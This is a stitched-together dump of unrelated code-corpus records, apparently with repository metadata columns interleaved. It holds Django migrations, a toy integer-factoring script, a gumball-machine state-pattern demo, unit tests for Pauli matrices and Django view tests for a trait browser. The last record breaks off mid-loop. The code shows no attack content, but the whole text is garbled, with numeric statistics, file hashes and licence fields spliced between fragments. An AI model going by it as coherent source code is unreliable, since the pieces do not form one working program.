'admin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bids': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'39.29038,-76.61219'", 'max_length': '255'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['sell']
| 65.913534
| 192
| 0.579422
| 1,894
| 17,533
| 5.257128
| 0.078142
| 0.105253
| 0.182786
| 0.261123
| 0.788189
| 0.779452
| 0.775535
| 0.763081
| 0.732851
| 0.66285
| 0
| 0.007561
| 0.192893
| 17,533
| 265
| 193
| 66.162264
| 0.696064
| 0.027434
| 0
| 0.325792
| 0
| 0
| 0.522487
| 0.308537
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00905
| false
| 0.004525
| 0.0181
| 0
| 0.040724
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
233f161e61d3849c21924a34c7bb16d8d2f37f9d
| 1,312
|
py
|
Python
|
pokepy/migrations/0001_initial.py
|
locolan/pokepy
|
bc77a4ef338b5575ae0e8245c0fb205016c6c11b
|
[
"MIT"
] | null | null | null |
pokepy/migrations/0001_initial.py
|
locolan/pokepy
|
bc77a4ef338b5575ae0e8245c0fb205016c6c11b
|
[
"MIT"
] | null | null | null |
pokepy/migrations/0001_initial.py
|
locolan/pokepy
|
bc77a4ef338b5575ae0e8245c0fb205016c6c11b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Abilities',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
),
migrations.CreateModel(
name='EggGroups',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
),
migrations.CreateModel(
name='Moves',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
),
migrations.CreateModel(
name='Pokemon',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
),
migrations.CreateModel(
name='Search',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
),
]
| 29.818182
| 114
| 0.53811
| 115
| 1,312
| 5.965217
| 0.295652
| 0.153061
| 0.182216
| 0.167638
| 0.721574
| 0.721574
| 0.721574
| 0.721574
| 0.721574
| 0.721574
| 0
| 0.00114
| 0.331555
| 1,312
| 43
| 115
| 30.511628
| 0.781072
| 0.016006
| 0
| 0.675676
| 0
| 0
| 0.043445
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.054054
| 0
| 0.135135
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
23663ff596c76d94042f411bd9c658d029a7637a
| 897
|
py
|
Python
|
dasilva3.py
|
yanapermana/metadecryptor
|
7c3e11ddb8ae05c19dbebd8ed2c744ff86ceaa2f
|
[
"BSD-3-Clause"
] | 49
|
2015-07-03T21:21:45.000Z
|
2022-03-31T04:04:42.000Z
|
dasilva3.py
|
hangetzzu/metadecryptor
|
7c3e11ddb8ae05c19dbebd8ed2c744ff86ceaa2f
|
[
"BSD-3-Clause"
] | 3
|
2015-11-03T03:49:25.000Z
|
2019-11-04T16:03:18.000Z
|
dasilva3.py
|
hangetzzu/metadecryptor
|
7c3e11ddb8ae05c19dbebd8ed2c744ff86ceaa2f
|
[
"BSD-3-Clause"
] | 17
|
2015-07-05T15:24:18.000Z
|
2022-01-17T22:33:26.000Z
|
from lib3 import *
def Nrev(N):
return int(str(N)[::-1])
def dasilva(N):
Nv = Nrev(N)
stop = False
r = 2
while stop == False:
if gcd(N, Nv+r) != 1:
return gcd(N, Nv+r), int(N/gcd(N, Nv+r))
stop = True
if gcd(N, 2*Nv+r) != 1:
return gcd(N, 2*Nv+r), int(N/gcd(N, 2*Nv+r))
stop = True
if gcd(N, Nv-r) != 1:
return gcd(N, Nv-r), int(N/gcd(N, Nv-r))
stop = True
if gcd(N, 2*Nv-r) != 1:
return gcd(N, 2*Nv-r), int(N/gcd(N, 2*Nv-r))
stop = True
if gcd(N, Nv*r+1) != 1:
return gcd(N, Nv*r+1), int(N/gcd(N, Nv*r+1))
stop = True
if gcd(N, Nv*r+2) != 1:
return gcd(N, Nv*r+2), int(N/gcd(N, Nv*r+2))
stop = True
if gcd(N, Nv*r-1) != 1:
return gcd(N, Nv*r-1), int(N/gcd(N, Nv*r-1))
stop = True
if gcd(N, Nv*r-2) != 1:
return gcd(N, Nv*r-2), int(N/gcd(N, Nv*r-2))
stop = True
r += 1
if __name__ == '__main__':
N = 143
print(dasilva(N))
| 23
| 47
| 0.523969
| 204
| 897
| 2.264706
| 0.117647
| 0.207792
| 0.233766
| 0.272727
| 0.766234
| 0.766234
| 0.766234
| 0.766234
| 0.766234
| 0.766234
| 0
| 0.048246
| 0.237458
| 897
| 39
| 48
| 23
| 0.627193
| 0
| 0
| 0.222222
| 0
| 0
| 0.008909
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.027778
| 0.027778
| 0.333333
| 0.027778
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
001abc3ce3867c4826d43d399caec6da5d81f923
| 71
|
py
|
Python
|
principal.py
|
rodzampa/travis2
|
39488bdc49b0570280c3e4ba2e08a658e528ed0d
|
[
"Apache-2.0"
] | null | null | null |
principal.py
|
rodzampa/travis2
|
39488bdc49b0570280c3e4ba2e08a658e528ed0d
|
[
"Apache-2.0"
] | null | null | null |
principal.py
|
rodzampa/travis2
|
39488bdc49b0570280c3e4ba2e08a658e528ed0d
|
[
"Apache-2.0"
] | null | null | null |
def mult (x,y):
return (x*y)
def div (x,y):
return (x/y)
| 10.142857
| 16
| 0.464789
| 14
| 71
| 2.357143
| 0.428571
| 0.242424
| 0.484848
| 0.545455
| 0.606061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.338028
| 71
| 7
| 17
| 10.142857
| 0.702128
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
cc785922fb6466700bc1c2e7d486b7b2019ee03f
| 990
|
py
|
Python
|
10_StatePattern/main.py
|
gama79530/DesignPattern
|
707e20a1e379d59b6b41a5fe389935c8caa4b1b1
|
[
"MIT"
] | null | null | null |
10_StatePattern/main.py
|
gama79530/DesignPattern
|
707e20a1e379d59b6b41a5fe389935c8caa4b1b1
|
[
"MIT"
] | null | null | null |
10_StatePattern/main.py
|
gama79530/DesignPattern
|
707e20a1e379d59b6b41a5fe389935c8caa4b1b1
|
[
"MIT"
] | null | null | null |
import GumballMachine
if __name__ == "__main__":
gumball_machine = GumballMachine.GumballMachine(10)
print(str(gumball_machine))
gumball_machine.insertQuarter()
gumball_machine.turnCrank()
gumball_machine.insertQuarter()
gumball_machine.turnCrank()
print(str(gumball_machine))
gumball_machine.insertQuarter()
gumball_machine.turnCrank()
gumball_machine.insertQuarter()
gumball_machine.turnCrank()
print(str(gumball_machine))
gumball_machine.insertQuarter()
gumball_machine.turnCrank()
gumball_machine.insertQuarter()
gumball_machine.turnCrank()
print(str(gumball_machine))
gumball_machine.insertQuarter()
gumball_machine.turnCrank()
gumball_machine.insertQuarter()
gumball_machine.turnCrank()
print(str(gumball_machine))
gumball_machine.insertQuarter()
gumball_machine.turnCrank()
gumball_machine.insertQuarter()
gumball_machine.turnCrank()
print(str(gumball_machine))
| 28.285714
| 55
| 0.748485
| 94
| 990
| 7.510638
| 0.12766
| 0.535411
| 0.382436
| 0.481586
| 0.895184
| 0.895184
| 0.895184
| 0.895184
| 0.895184
| 0.895184
| 0
| 0.002398
| 0.157576
| 990
| 35
| 56
| 28.285714
| 0.844125
| 0
| 0
| 0.896552
| 0
| 0
| 0.008073
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.034483
| 0.206897
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
cc877ab81a6f101015432789ba34e7edd8723c15
| 8,653
|
py
|
Python
|
tests/pauli/test_get_norder_paulis.py
|
BQSKit/qfast
|
06df0c7439ae096af2d1fa3e97b44512618f5e4a
|
[
"BSD-3-Clause-LBNL"
] | 12
|
2020-09-23T17:43:17.000Z
|
2022-01-17T18:23:11.000Z
|
tests/pauli/test_get_norder_paulis.py
|
edyounis/qfast
|
06df0c7439ae096af2d1fa3e97b44512618f5e4a
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2020-09-26T00:46:55.000Z
|
2021-03-15T17:52:54.000Z
|
tests/pauli/test_get_norder_paulis.py
|
BQSKit/qfast
|
06df0c7439ae096af2d1fa3e97b44512618f5e4a
|
[
"BSD-3-Clause-LBNL"
] | 2
|
2021-05-31T05:29:20.000Z
|
2021-12-06T13:18:22.000Z
|
import numpy as np
import unittest as ut
from qfast.pauli import get_norder_paulis
class TestGetNorderPaulis ( ut.TestCase ):
def in_array( self, needle, haystack ):
for elem in haystack:
if np.allclose( elem, needle ):
return True
return False
def test_get_norder_paulis_n1 ( self ):
num_qubits = -1
self.assertRaises( ValueError, get_norder_paulis, num_qubits )
def test_get_norder_paulis_0 ( self ):
num_qubits = 0
paulis = get_norder_paulis( num_qubits )
self.assertTrue( len( paulis ) == 4 ** num_qubits )
I = np.array( [[1, 0], [0, 1]], dtype = np.complex128 )
self.assertTrue( self.in_array( I, paulis ) )
def test_get_norder_paulis_1 ( self ):
num_qubits = 1
paulis = get_norder_paulis( num_qubits )
self.assertTrue( len( paulis ) == 4 ** num_qubits )
X = np.array( [[0, 1], [1, 0]], dtype = np.complex128 )
Y = np.array( [[0, -1j], [1j, 0]], dtype = np.complex128 )
Z = np.array( [[1, 0], [0, -1]], dtype = np.complex128 )
I = np.array( [[1, 0], [0, 1]], dtype = np.complex128 )
self.assertTrue( self.in_array( X, paulis ) )
self.assertTrue( self.in_array( Y, paulis ) )
self.assertTrue( self.in_array( Z, paulis ) )
self.assertTrue( self.in_array( I, paulis ) )
def test_get_norder_paulis_2 ( self ):
num_qubits = 2
paulis = get_norder_paulis( num_qubits )
self.assertTrue( len( paulis ) == 4 ** num_qubits )
X = np.array( [[0, 1], [1, 0]], dtype = np.complex128 )
Y = np.array( [[0, -1j], [1j, 0]], dtype = np.complex128 )
Z = np.array( [[1, 0], [0, -1]], dtype = np.complex128 )
I = np.array( [[1, 0], [0, 1]], dtype = np.complex128 )
self.assertTrue( self.in_array( np.kron( X, X ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, Y ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, Z ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, I ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, X ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, Y ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, Z ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, I ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, X ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, Y ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, Z ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, I ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, X ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, Y ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, Z ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, I ), paulis ) )
def test_get_norder_paulis_3 ( self ):
num_qubits = 3
paulis = get_norder_paulis( num_qubits )
self.assertTrue( len( paulis ) == 4 ** num_qubits )
X = np.array( [[0, 1], [1, 0]], dtype = np.complex128 )
Y = np.array( [[0, -1j], [1j, 0]], dtype = np.complex128 )
Z = np.array( [[1, 0], [0, -1]], dtype = np.complex128 )
I = np.array( [[1, 0], [0, 1]], dtype = np.complex128 )
self.assertTrue( self.in_array( np.kron( X, np.kron( X, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( X, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( X, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( X, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( Y, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( Y, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( Y, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( Y, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( Z, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( Z, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( Z, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( Z, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( I, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( I, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( I, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( X, np.kron( I, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( X, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( X, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( X, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( X, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( Y, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( Y, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( Y, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( Y, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( Z, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( Z, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( Z, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( Z, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( I, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( I, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( I, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Y, np.kron( I, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( X, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( X, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( X, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( X, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( Y, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( Y, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( Y, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( Y, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( Z, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( Z, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( Z, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( Z, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( I, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( I, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( I, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( Z, np.kron( I, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( X, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( X, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( X, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( X, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( Y, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( Y, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( Y, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( Y, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( Z, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( Z, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( Z, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( Z, I ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( I, X ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( I, Y ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( I, Z ) ), paulis ) )
self.assertTrue( self.in_array( np.kron( I, np.kron( I, I ) ), paulis ) )
if __name__ == '__main__':
ut.main()
| 56.927632
| 81
| 0.571478
| 1,310
| 8,653
| 3.667939
| 0.038931
| 0.179813
| 0.318418
| 0.353798
| 0.9359
| 0.920291
| 0.920291
| 0.89948
| 0.89948
| 0.89948
| 0
| 0.016335
| 0.257136
| 8,653
| 151
| 82
| 57.304636
| 0.731176
| 0
| 0
| 0.179688
| 0
| 0
| 0.000925
| 0
| 0
| 0
| 0
| 0
| 0.703125
| 1
| 0.046875
| false
| 0
| 0.023438
| 0
| 0.09375
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
cca496de0509b2adf33f6d4461cf81a0b607772c
| 291,243
|
py
|
Python
|
trait_browser/test_views.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | null | null | null |
trait_browser/test_views.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | 3
|
2020-01-02T20:17:06.000Z
|
2020-01-04T21:13:09.000Z
|
trait_browser/test_views.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | 1
|
2021-10-29T22:15:27.000Z
|
2021-10-29T22:15:27.000Z
|
"""Test the functions and classes for views.py."""
from copy import copy
from datetime import timedelta
from django.contrib.auth.models import Group
from django.urls import reverse
from django.utils import timezone
from core.utils import (DCCAnalystLoginTestCase, get_autocomplete_view_ids, LoginRequiredTestCase,
PhenotypeTaggerLoginTestCase, UserLoginTestCase)
from tags.models import TaggedTrait, DCCReview
from tags.factories import DCCReviewFactory, TagFactory, TaggedTraitFactory
from . import factories
from . import forms
from . import models
from . import tables
from . import searches
from .test_searches import ClearSearchIndexMixin
from .views import TABLE_PER_PAGE
# NB: The database is reset for each test method within a class!
# NB: for test methods with multiple assertions, the first failed assert statement
# will preclude any subsequent assertions
class StudyDetailTest(UserLoginTestCase):
"""Unit tests for the StudyDetail view."""
def setUp(self):
super(StudyDetailTest, self).setUp()
self.study = factories.StudyFactory.create()
self.study_version = factories.SourceStudyVersionFactory.create(study=self.study, i_is_deprecated=False)
self.datasets = factories.SourceDatasetFactory.create_batch(2, source_study_version=self.study_version)
for dataset in self.datasets:
factories.SourceTraitFactory.create_batch(5, source_dataset=dataset)
self.source_traits = list(models.SourceTrait.objects.filter(
source_dataset__source_study_version=self.study_version))
def get_url(self, *args):
return reverse('trait_browser:source:studies:pk:detail', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.study.pk))
self.assertEqual(response.status_code, 200)
def test_view_with_invalid_pk(self):
"""View returns 404 response code when the pk doesn't exist."""
response = self.client.get(self.get_url(self.study.pk + 1))
self.assertEqual(response.status_code, 404)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIn('study', context)
self.assertIn('trait_count', context)
self.assertIn('dataset_count', context)
self.assertEqual(context['study'], self.study)
self.assertEqual(context['trait_count'], '{:,}'.format(len(self.source_traits)))
dataset_count = models.SourceDataset.objects.filter(source_study_version__study=self.study).count()
self.assertEqual(context['dataset_count'], '{:,}'.format(dataset_count))
def test_tagged_trait_button_present(self):
"""The button to show tagged traits is present when there are tagged traits for the study."""
tagged_traits = TaggedTraitFactory.create_batch(
10, trait__source_dataset__source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertContains(response, reverse('trait_browser:source:studies:pk:traits:tagged', args=[self.study.pk]))
def test_no_tagged_trait_button_present_for_deprecated_tagged_trait(self):
"""The button to show tagged traits is not present with only deprecated tagged traits for the study."""
tagged_traits = TaggedTraitFactory.create_batch(
10,
trait__source_dataset__source_study_version__study=self.study,
trait__source_dataset__source_study_version__i_is_deprecated=True
)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
expected_url = reverse('trait_browser:source:studies:pk:traits:tagged', args=[self.study.pk])
self.assertNotContains(response, expected_url)
def test_no_new_trait_button_with_no_new_variables(self):
"""The button to show new traits is not present if there are no new traits."""
self.study_version.i_is_deprecated = True
self.study_version.save()
new_version = factories.SourceStudyVersionFactory.create(
study=self.study, i_version=self.study_version.i_version + 1, i_date_added=timezone.now())
for x in self.source_traits:
factories.SourceTraitFactory.create(
source_dataset__source_study_version=new_version,
i_dbgap_variable_accession=x.i_dbgap_variable_accession)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIn('show_new_trait_button', context)
self.assertFalse(context['show_new_trait_button'])
self.assertNotContains(response, reverse('trait_browser:source:studies:pk:traits:new', args=[self.study.pk]))
def test_new_trait_button_with_new_variables(self):
"""The button to show new traits is present if there are new traits."""
new_study_version = factories.SourceStudyVersionFactory.create(
study=self.study,
i_version=self.study_version.i_version + 1,
i_date_added=timezone.now())
# Create a new trait in this version
new_traits = factories.SourceTraitFactory.create_batch(
2, source_dataset__source_study_version=new_study_version)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIn('show_new_trait_button', context)
self.assertTrue(context['show_new_trait_button'])
self.assertContains(response, reverse('trait_browser:source:studies:pk:traits:new', args=[self.study.pk]))
def test_no_new_dataset_button_with_no_new_datasets(self):
"""The button to show new datasets is not present if there are no new datasets."""
self.study_version.i_is_deprecated = True
self.study_version.save()
new_version = factories.SourceStudyVersionFactory.create(
study=self.study, i_version=self.study_version.i_version + 1, i_date_added=timezone.now())
for dataset in self.datasets:
factories.SourceDatasetFactory.create(
source_study_version=new_version, i_accession=dataset.i_accession)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIn('show_new_dataset_button', context)
self.assertFalse(context['show_new_dataset_button'])
self.assertNotContains(response, reverse('trait_browser:source:studies:pk:datasets:new', args=[self.study.pk]))
def test_new_dataset_button_with_new_datasets(self):
"""The button to show new datasets is present if there are new datasets."""
self.study_version.i_is_deprecated = True
self.study_version.save()
new_version = factories.SourceStudyVersionFactory.create(
study=self.study, i_version=self.study_version.i_version + 1, i_date_added=timezone.now())
new_dataset = factories.SourceDatasetFactory.create(source_study_version=new_version)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIn('show_new_dataset_button', context)
self.assertTrue(context['show_new_dataset_button'])
self.assertContains(response, reverse('trait_browser:source:studies:pk:datasets:new', args=[self.study.pk]))
class StudyListTest(UserLoginTestCase):
"""Unit tests for the StudyList view."""
def setUp(self):
super(StudyListTest, self).setUp()
self.studies = factories.StudyFactory.create_batch(10)
def get_url(self, *args):
return reverse('trait_browser:source:studies:list')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertIn('study_table', context)
self.assertIsInstance(context['study_table'], tables.StudyTable)
def test_table_has_no_rows(self):
"""When there are no studies, there are no rows in the table, but the view still works."""
models.Study.objects.all().delete()
response = self.client.get(self.get_url())
context = response.context
table = context['study_table']
self.assertEqual(len(table.rows), 0)
class StudyNameAutocompleteTest(UserLoginTestCase):
def get_url(self):
return reverse('trait_browser:source:studies:autocomplete:by-name')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_returns_all_studies_with_no_query(self):
studies = factories.StudyFactory.create_batch(10)
response = self.client.get(self.get_url())
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study.pk for study in studies]), sorted(pks))
def test_works_with_no_studies(self):
response = self.client.get(self.get_url())
pks = get_autocomplete_view_ids(response)
self.assertEqual(len(pks), 0)
def test_finds_one_matching_study(self):
factories.StudyFactory.create(i_study_name='other')
study = factories.StudyFactory.create(i_study_name='my study')
response = self.client.get(self.get_url(), {'q': 'stu'})
pks = get_autocomplete_view_ids(response)
self.assertEqual([study.pk], pks)
def test_finds_two_matching_studies(self):
factories.StudyFactory.create(i_study_name='other')
study_1 = factories.StudyFactory.create(i_study_name='my study')
study_2 = factories.StudyFactory.create(i_study_name='another sturgeon')
response = self.client.get(self.get_url(), {'q': 'stu'})
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study_1.pk, study_2.pk]), sorted(pks))
class StudyPHSAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(StudyPHSAutocompleteTest, self).setUp()
# Create 10 studies.
self.studies = []
test_phs_values = (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, )
self.TEST_PHS_QUERIES = {
'5': (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, ),
'05': (),
'0005': (500, 555, 520, ),
'000005': (5, ),
'52': (52, 520, 5200, ),
'052': (),
'0052': (5200, ),
'00052': (520, ),
'555555': (555555, ),
'0': (5, 50, 500, 55, 555, 52, 520, 5200, ),
}
for phs in test_phs_values:
self.studies.append(factories.StudyFactory.create(i_accession=phs))
def get_url(self, *args):
return reverse('trait_browser:source:studies:autocomplete:by-phs', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
tmp = self.get_url()
response = self.client.get(tmp)
self.assertEqual(response.status_code, 200)
def test_returns_all_studies_with_no_query(self):
"""Queryset returns all of the datasets with no query."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study.pk for study in self.studies]), sorted(pks))
def test_phs_test_queries_without_phs_in_string(self):
"""Returns only the correct studies for each of the TEST_PHS_QUERIES when 'phs' is not in query string."""
url = self.get_url()
for query in self.TEST_PHS_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHS_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phs in expected_matches:
expected_pk = models.Study.objects.get(i_accession=expected_phs).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected pht {} with query '{}'".format(expected_phs, query))
def test_phs_test_queries_with_phs_in_string(self):
"""Returns only the correct study for each of the TEST_PHS_QUERIES when 'phs' is in query string."""
url = self.get_url()
for query in self.TEST_PHS_QUERIES:
response = self.client.get(url, {'q': 'phs' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHS_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phs in expected_matches:
